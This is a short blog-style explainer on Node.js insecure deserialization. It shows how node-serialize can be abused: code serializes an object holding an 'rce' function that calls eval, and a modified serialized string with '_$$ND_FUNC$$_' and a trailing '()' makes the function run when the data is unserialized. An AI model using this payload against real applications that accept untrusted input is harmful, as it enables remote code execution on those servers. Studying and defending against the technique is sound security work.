
node is a technology allowing server based apps to be written in Javascript. Why? I get why...but why?

In all seriousness it's pretty cool, but requires a different approach than the standard php based web applications that are so common.


With node, and in all honesty any serialization framework, there can be issues if the application accepts untrusted input. With node-serialize we can use the following code to serialize a custom function object.

var y = {
    rce: function(){eval(<function>)}

var serialize = require('node-serialize')
console.log("Serialized: \n" + serialize.serialize(y))

If we then modify the output to call the resulting object as a function we get:

{"rce":"_$$ND_FUNC$$_function (){eval(<function>)}()"}

Once the object is unserialized, the function will be called.


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